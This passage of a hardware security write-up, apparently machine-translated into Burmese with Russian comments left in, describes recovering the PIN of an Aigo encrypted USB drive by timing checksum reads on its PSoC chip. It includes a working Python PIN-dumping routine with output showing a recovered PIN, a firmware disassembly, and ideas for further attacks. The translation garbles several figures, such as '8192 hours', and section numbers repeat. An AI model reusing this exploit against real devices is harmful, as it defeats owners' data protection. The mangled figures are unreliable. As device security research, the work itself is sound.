1. PSoC ကို ပြန်လည်စတင်သည် (၎င်းကို မှော်နံပါတ်တစ်ခု ပေးပို့သည်)။
2. အစပြုခြင်း vector များ အပြည့်အစုံ ပေးပို့သည်။
3. မိုက်ခရိုစက္ကန့်အတွင်း နှောင့်နှေးမှုကို ကန့်သတ်ချက်တစ်ခုအဖြစ် ကျော်သွားသည့် Arduino လုပ်ဆောင်ချက် Cmnd_STK_START_CSUM (0x85) ကို ခေါ်ဆိုသည်။
4. checksum (0xF8 နှင့် 0xF9) နှင့် အထောက်အထားမဲ့ မှတ်ပုံတင် 0xF1 ကိုဖတ်သည်။

ဤကုဒ်ကို 10 မိုက်ခရိုစက္ကန့်အတွင်း 1 ကြိမ် လုပ်ဆောင်သည်။ 0xF1 သည် checksum ကို တွက်ချက်ရာတွင် ပြောင်းလဲသော တစ်ခုတည်းသော မှတ်ပုံတင်ဖြစ်သောကြောင့် ဤနေရာတွင် ပါဝင်သည်။ ဂဏန်းသင်္ချာယုတ္တိယူနစ်မှ အသုံးပြုသော ယာယီကိန်းရှင်တစ်မျိုးဖြစ်နိုင်သည်။ Arduino သည် အသက်လက္ခဏာများပြသခြင်းရပ်သွားသောအခါ Arduino ကို picocom ကိုအသုံးပြု၍ ပြန်လည်သတ်မှတ်ရန်အသုံးပြုသည့် အရုပ်ဆိုးသောဟက်ခ်ကို သတိပြုပါ။ (ဘာကြောင့်မှန်းမသိ)။

၇.၂။ ရလဒ်ကိုဖတ်ခြင်း။

Python script ၏ရလဒ်သည် ဤကဲ့သို့ဖြစ်သည် (ဖတ်ရှုနိုင်စေရန်အတွက် အလွယ်ပြုလုပ်ထားသည်-

DELAY F1 F8 F9  # F1 – вышеупомянутый неизвестный регистр
                  # F8 младший байт контрольной суммы
                  # F9 старший байт контрольной суммы

00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00  # контрольная сумма сбрасывается в 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00  # 1-й байт: 0x0080-0x0000 = 0x80 
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00   # 2-й байт: 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01  # понятия не имею, что здесь происходит
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00  # Снова E7?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00  # Хмммммм
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01  # А, дошло! Вот он же перенос в старший байт
00063 01 17 01
[...]
00075 CC 17 01  # Итак, 0x117-0xE7: 0x30

ထိုသို့ပြောခြင်းမှာ ကျွန်ုပ်တို့တွင် ပြဿနာတစ်ခုရှိသည်- ကျွန်ုပ်တို့သည် အမှန်တကယ် checksum တစ်ခုဖြင့် လုပ်ဆောင်နေသောကြောင့် null byte သည် read value ကို မပြောင်းလဲပါ။ သို့သော်၊ တွက်ချက်မှုလုပ်ငန်းစဉ်တစ်ခုလုံး (8192 bytes) သည် 0,1478 စက္ကန့်ကြာသည် (၎င်းကိုလည်ပတ်သည့်အချိန်တိုင်းတွင် အနည်းငယ်ကွဲလွဲမှုများနှင့်အတူ) ခန့်မှန်းခြေအားဖြင့် 18,04 μs per byte နှင့်ညီမျှသောကြောင့်၊ checksum တန်ဖိုးကို သင့်လျော်သောအချိန်တွင် စစ်ဆေးရန် ဤအချိန်ကို ကျွန်ုပ်တို့အသုံးပြုနိုင်ပါသည်။ ပထမအပြေးအတွက်၊ တွက်ချက်မှုလုပ်ထုံးလုပ်နည်း၏ကြာချိန်သည် အမြဲတမ်းနီးပါးတူညီသောကြောင့် အရာအားလုံးကို အလွယ်တကူဖတ်နိုင်သည်။ သို့သော်၊ ဤအမှိုက်ပုံ၏အဆုံးသည် ပြေးခြင်းတစ်ခုစီရှိ "အသေးအဖွဲ အချိန်ကိုက်သွေဖည်မှုများ" သည် သိသာထင်ရှားလာစေရန် ပေါင်းထည့်သောကြောင့်၊

134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD

၎င်းသည် မိုက်ခရိုစက္ကန့်နှောင့်နှေးမှုတိုင်းအတွက် အမှိုက်ပုံး ၁၀ ခုဖြစ်သည်။ flash drive တစ်ခု၏ 10 bytes အားလုံးကို စွန့်ပစ်ရန်အတွက် စုစုပေါင်းလည်ပတ်ချိန်သည် 8192 နာရီဖြစ်သည်။

၇.၃။ Flash binary ပြန်လည်တည်ဆောက်မှု

အချိန်သွေဖည်မှုအားလုံးကို ထည့်သွင်းစဉ်းစားပြီး flash drive ၏ ပရိုဂရမ်ကုဒ်ကို ပြန်လည်တည်ဆောက်မည့် ကုဒ်ကို ကျွန်ုပ်ရေးသားခြင်း မပြီးသေးပါ။ သို့သော်၊ ကျွန်ုပ်သည် ဤကုဒ်၏အစကို ပြန်လည်ရယူပြီးဖြစ်သည်။ မှန်ကန်ကြောင်း သေချာစေရန် m8cdis ကို အသုံးပြု၍ ဖြုတ်လိုက်ပါသည်။

0000: 80 67   jmp  0068h     ; Reset vector
[...]
0068: 71 10   or  F,010h
006a: 62 e3 87 mov  reg[VLT_CR],087h
006d: 70 ef   and  F,0efh
006f: 41 fe fb and  reg[CPU_SCR1],0fbh
0072: 50 80   mov  A,080h
0074: 4e    swap A,SP
0075: 55 fa 01 mov  [0fah],001h
0078: 4f    mov  X,SP
0079: 5b    mov  A,X
007a: 01 03   add  A,003h
007c: 53 f9   mov  [0f9h],A
007e: 55 f8 3a mov  [0f8h],03ah
0081: 50 06   mov  A,006h
0083: 00    ssc
[...]
0122: 18    pop  A
0123: 71 10   or  F,010h
0125: 43 e3 10 or  reg[VLT_CR],010h
0128: 70 00   and  F,000h ; Paging mode changed from 3 to 0
012a: ef 62   jacc 008dh
012c: e0 00   jacc 012dh
012e: 71 10   or  F,010h
0130: 62 e0 02 mov  reg[OSC_CR0],002h
0133: 70 ef   and  F,0efh
0135: 62 e2 00 mov  reg[INT_VC],000h
0138: 7c 19 30 lcall 1930h
013b: 8f ff   jmp  013bh
013d: 50 08   mov  A,008h
013f: 7f    ret

ကြည့်ရတာ အတော်လေးကို ဖြစ်နိုင်တယ်။

၇.၄။ ပင်နံပါတ်ကုဒ် သိုလှောင်မှုလိပ်စာကို ရှာဖွေခြင်း။

ယခု ကျွန်ုပ်တို့လိုအပ်သည့်အချိန်များတွင် checksum ကိုဖတ်နိုင်သည်၊ ကျွန်ုပ်တို့သည် မည်သည့်အချိန်တွင် ပြောင်းလဲသွားသည်ကို အလွယ်တကူစစ်ဆေးနိုင်သည်-

• မှားယွင်းသော PIN ကုဒ်ကို ရိုက်ထည့်ပါ။
• pin code ကိုပြောင်းပါ။

ပထမဦးစွာ၊ အနီးစပ်ဆုံး သိုလှောင်မှုလိပ်စာကို ရှာဖွေရန်၊ ပြန်လည်စတင်ပြီးနောက် 10 ms အတိုးအလျှော့ဖြင့် checksum dump ကိုယူခဲ့သည်။ ထို့နောက် ကျွန်ုပ်သည် ပင်နံပါတ်မှားရိုက်ထည့်လိုက်ပြီး အလားတူလုပ်ခဲ့သည်။

အပြောင်းအလဲများစွာရှိသောကြောင့် ရလဒ်သည် အလွန်သာယာပါသည်။ သို့သော် နောက်ဆုံးတွင် checksum သည် ကြန့်ကြာမှု 120000 µs နှင့် 140000 µs အကြား တစ်နေရာရာသို့ ပြောင်းလဲသွားကြောင်း ကျွန်ုပ်ဆုံးဖြတ်နိုင်ခဲ့သည်။ ဒါပေမယ့် အဲဒီမှာ ကျွန်တော်ပြထားတဲ့ “ပင်ကုဒ်” ဟာ လုံး၀ မှားယွင်းနေပါတယ် - 0 ကို ဖြတ်သွားတဲ့အခါ ထူးဆန်းတဲ့အရာတွေကို လုပ်ဆောင်ပေးတဲ့ နှောင့်နှေးမိုက်ခရိုစက္ကန့်လုပ်ထုံးလုပ်နည်းရဲ့ ရှေးဟောင်းပစ္စည်းတစ်ခုကြောင့်ပါ။

ထို့နောက်၊ 3 နာရီနီးပါးကြာပြီးနောက်၊ SROM စနစ်ခေါ်ဆိုမှု CheckSum သည် checksum အတွက်လုပ်ကွက်အရေအတွက်ကိုသတ်မှတ်ပေးသည့်ထည့်သွင်းမှုအဖြစ်အငြင်းအခုံတစ်ခုကိုလက်ခံရရှိကြောင်းသတိရမိသည်။ အဲဒါ။ ကျွန်ုပ်တို့သည် 64-byte ပိတ်ဆို့ခြင်းအထိ တိကျမှုဖြင့် PIN ကုဒ်၏ သိုလှောင်မှုလိပ်စာနှင့် "မှားယွင်းသောကြိုးပမ်းမှုများ" တန်ပြန်ကို အလွယ်တကူ အလွယ်တကူ ပြောင်းလဲနိုင်သည်။

ကျွန်ုပ်၏ ကနဦးလုပ်ဆောင်မှုများသည် အောက်ပါရလဒ်ကို ဖြစ်ပေါ်စေသည်-

ထို့နောက် ကျွန်ုပ်သည် "123456" မှ "1234567" သို့ ပြောင်းပြီး ရရှိပါသည်-

ထို့ကြောင့်၊ ပင်နံပါတ်ကုဒ်နှင့် မှားယွင်းသောကြိုးပမ်းမှုကောင်တာကို ပိတ်ဆို့အမှတ် 126 တွင် သိမ်းဆည်းထားပုံရသည်။

၇.၅။ အမှိုက်ပုံကြီး အမှတ် ၁၂၆ ကို ယူခြင်း။

ပိတ်ဆို့ခြင်း #126 သည် 125x64x18 = 144000μs ဝန်းကျင်၊ checksum တွက်ချက်မှုစတင်ချိန်မှ၊ ကျွန်ုပ်၏အမှိုက်ပုံကြီးတစ်ခုလုံးတွင် တည်ရှိနေသင့်ပြီး ၎င်းသည် အလွန်ယုံကြည်ဖွယ်ကောင်းလှသည်။ ထို့နောက်၊ မမှန်ကန်သောအမှိုက်အများအပြားကို ကိုယ်တိုင် ဖယ်ရှားပြီးနောက် (“အချိန်ကိုက်သွေဖည်မှု” များစုပုံနေခြင်းကြောင့်)၊ ဤဘိုက်များကို ကျွန်တော်ရရှိသွားသည် (145527 μs ၏ latency တွင်)။

ပင်နံပါတ်ကုဒ်ကို ကုဒ်မထားသောပုံစံဖြင့် သိမ်းဆည်းထားကြောင်း သိသာပါသည်။ ဤတန်ဖိုးများကို ASCII ကုဒ်များတွင် ရေးထားခြင်းမရှိသော်လည်း၊ ၎င်းတို့သည် capacitive keyboard မှရရှိသော ဖတ်ရှုမှုများကို ထင်ဟပ်စေသည်။

နောက်ဆုံးတွင်၊ မကောင်းသောကြိုးစားမှုကောင်တာအား သိမ်းဆည်းထားသည့်နေရာတွင် ရှာဖွေရန် နောက်ထပ်စစ်ဆေးမှုအချို့ကို ကျွန်ုပ်လုပ်ဆောင်ခဲ့သည်။ ဤသည်မှာ ရလဒ်ဖြစ်သည်-

0xFF - ဆိုသည်မှာ "15 ကြိမ်ကြိုးစားမှု" နှင့် မအောင်မြင်သောကြိုးစားမှုတိုင်းတွင် လျော့နည်းသွားပါသည်။

၇.၆။ ပင်နံပါတ်ကုဒ် ပြန်လည်ရယူခြင်း။

ဤအရာသည် အထက်ဖော်ပြပါတို့ကို ပေါင်းစပ်ထားသော ကျွန်ုပ်၏ရုပ်ဆိုးသောကုဒ်ဖြစ်သည်-

def dump_pin():
  pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
        0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
  last_csum = 0
  pin_bytes = []
  for delay in range(145495, 145719, 16):
    csum = csum_at(delay, 1)
    byte = (csum-last_csum)&0xFF
    print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
    pin_bytes.append(byte)
    last_csum = csum
  print "PIN: ",
  for i in range(0, len(pin_bytes)):
    if pin_bytes[i] in pin_map:
      print pin_map[pin_bytes[i]],
  print

ဤသည်မှာ ၎င်း၏ ကွပ်မျက်ခြင်း၏ ရလဒ်ဖြစ်သည်။

$ ./psoc.py 
syncing: KO OK
Resetting PSoC: KO Resetting PSoC: KO Resetting PSoC: OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN: 1 2 3 4 5 6 7 8 9

ဟူး! အလုပ်များ!

ကျွန်ုပ်အသုံးပြုခဲ့သည့် latency တန်ဖိုးများသည် သီးခြား PSoC တစ်ခုနှင့် ဆက်စပ်နိုင်ဖွယ်ရှိကြောင်း ကျေးဇူးပြု၍ သတိပြုပါ။

8. နောက်တစ်ခုက ဘာလဲ။

ထို့ကြောင့်ကျွန်ုပ်တို့၏ Aigo drive ၏အခြေအနေတွင် PSoC ဘက်မှ အကျဉ်းချုပ်ကြည့်ကြပါစို့။

• ကာကွယ်ထားသော်လည်း SRAM ကိုဖတ်နိုင်သည်၊
• cold boot trace attack သုံးပြီး PIN ကုဒ်ကို တိုက်ရိုက်ဖတ်ခြင်းဖြင့် ဆန့်ကျင်ပွတ်ဆွဲခြင်း အကာအကွယ်ကို ကျွန်ုပ်တို့ ကျော်ဖြတ်နိုင်ပါသည်။

သို့သော်၊ ကျွန်ုပ်တို့၏တိုက်ခိုက်မှုသည် ထပ်တူပြုခြင်းပြဿနာများကြောင့် ချို့ယွင်းချက်အချို့ရှိသည်။ ၎င်းကို အောက်ပါအတိုင်း မြှင့်တင်နိုင်ပါသည်။

• “cold boot trace” တိုက်ခိုက်မှု၏ရလဒ်အဖြစ်ရရှိသော output data ကိုမှန်ကန်စွာကုဒ်လုပ်ရန် utility တစ်ခုကိုရေးပါ။
• ပိုမိုတိကျသောအချိန်နှောင့်နှေးမှုများဖန်တီးရန် FPGA gadget ကိုအသုံးပြုပါ (သို့မဟုတ် Arduino hardware timers ကိုသုံးပါ);
• အခြားတိုက်ခိုက်မှုကို ကြိုးစားကြည့်ပါ- နှိုင်းယှဉ်ရန်အတွက် မှန်ကန်သော PIN ကုဒ်ကို RAM တွင် သိမ်းဆည်းမည်ဟု မျှော်လင့်ကာ တမင်တကာ မှားယွင်းနေသော PIN ကုဒ်ကို ရိုက်ထည့်ပါ၊ ပြန်လည်စတင်ပြီး RAM ကို စွန့်ပစ်ပါ။ သို့သော် Arduino အချက်ပြမှုအဆင့်သည် 5 ဗို့ဖြစ်ပြီး ကျွန်ုပ်တို့စစ်ဆေးနေသည့်ဘုတ်အဖွဲ့တွင် 3,3 ဗို့အချက်ပြမှုများဖြင့် အလုပ်လုပ်နေသောကြောင့် ၎င်းသည် Arduino တွင်ပြုလုပ်ရန်အလွန်လွယ်ကူပါသည်။

စမ်းသုံးကြည့်နိုင်သည့် စိတ်ဝင်စားစရာတစ်ခုမှာ ဖတ်ရှုမှုကာကွယ်ရေးကို ကျော်ဖြတ်ရန် ဗို့အားအဆင့်ဖြင့် ကစားခြင်းဖြစ်သည်။ အကယ်၍ ဤနည်းလမ်းသည် အလုပ်ဖြစ်ပါက၊ ကျွန်ုပ်တို့သည် တိကျသောအချိန်နှောင့်နှေးမှုများဖြင့် checksum ကိုဖတ်ခြင်းအစား flash drive မှလုံးဝတိကျသောဒေတာကိုရနိုင်မည်ဖြစ်သည်။

SROM သည် ReadBlock စနစ်ခေါ်ဆိုမှုမှတစ်ဆင့် guard bits ကိုဖတ်နိုင်သောကြောင့်၊ ကျွန်ုပ်တို့သည် အလားတူလုပ်ဆောင်နိုင်သည် ဖော်ပြခဲ့သည်။ Dmitry Nedospasov ၏ဘလော့ဂ်တွင် Chris Gerlinski ၏တိုက်ခိုက်မှုကိုပြန်လည်အကောင်အထည်ဖော်ရန်ညီလာခံတွင်ကြေငြာခဲ့သည်။ "REcon Brussels 2017".

လုပ်ဆောင်နိုင်သည့် နောက်ထပ်ပျော်စရာကောင်းသည့်အရာမှာ ချစ်ပ်ပြားမှ အမှုကို ကြိတ်ချေခြင်းဖြစ်သည်- SRAM အမှိုက်ပုံးကို ယူရန်၊ စာရွက်စာတမ်းမရှိသော စနစ်ခေါ်ဆိုမှုများနှင့် အားနည်းချက်များကို ဖော်ထုတ်ရန်ဖြစ်သည်။

၈။ နိဂုံး

ထို့ကြောင့်၊ ဤဒရိုက်ဗ်၏အကာအကွယ်သည် လိုချင်စရာများစွာကျန်တော့သည်၊ အဘယ်ကြောင့်ဆိုသော် ၎င်းသည် ပင်နံပါတ်ကုဒ်ကိုသိမ်းဆည်းရန် ပုံမှန် (“မာကျောသော”) မိုက်ခရိုကွန်ထရိုလာကို အသုံးပြုထားသောကြောင့်ဖြစ်သည်... ထို့အပြင်၊ ဒေတာများမည်ကဲ့သို့ဖြစ်နေသည်ကို ကျွန်ုပ် (မကြည့်ပါ) သေးပါ။ ဤစက်ပစ္စည်းပေါ်တွင် ကုဒ်ဝှက်ခြင်း

Aigo အတွက် ဘာအကြံပြုနိုင်မလဲ။ ကုဒ်ဝှက်ထားသော HDD drive မော်ဒယ်အချို့ကို ခွဲခြမ်းစိတ်ဖြာပြီးနောက်၊ 2015 တွင် ကျွန်တော်လုပ်ခဲ့သည်။ တင်ပြမှု SyScan တွင်၊ သူသည် ပြင်ပ HDD drive အများအပြား၏ လုံခြုံရေးပြဿနာများကို စစ်ဆေးခဲ့ပြီး ၎င်းတို့တွင် ပိုမိုကောင်းမွန်လာနိုင်သည့်အရာများကို အကြံပြုချက်များ ပြုလုပ်ခဲ့သည်။ 🙂

တနင်္ဂနွေ နှစ်ရက်နဲ့ ညနေများစွာ ဒီသုတေသနကို လုပ်ခဲ့တယ်။ စုစုပေါင်း နာရီ ၄၀ ခန့်။ အစမှ (ဒစ်ကိုဖွင့်သောအခါ) မှအဆုံးအထိ (PIN code dump) ကိုရေတွက်ပါ။ တူညီသော နာရီ ၄၀ တွင် ကျွန်ုပ်သည် ဤဆောင်းပါးကို ရေးသားခဲ့သော အချိန်လည်း ပါဝင်သည်။ အရမ်းစိတ်လှုပ်ရှားစရာကောင်းတဲ့ ခရီးစဉ်ဖြစ်ခဲ့ပါတယ်။

source: www.habr.com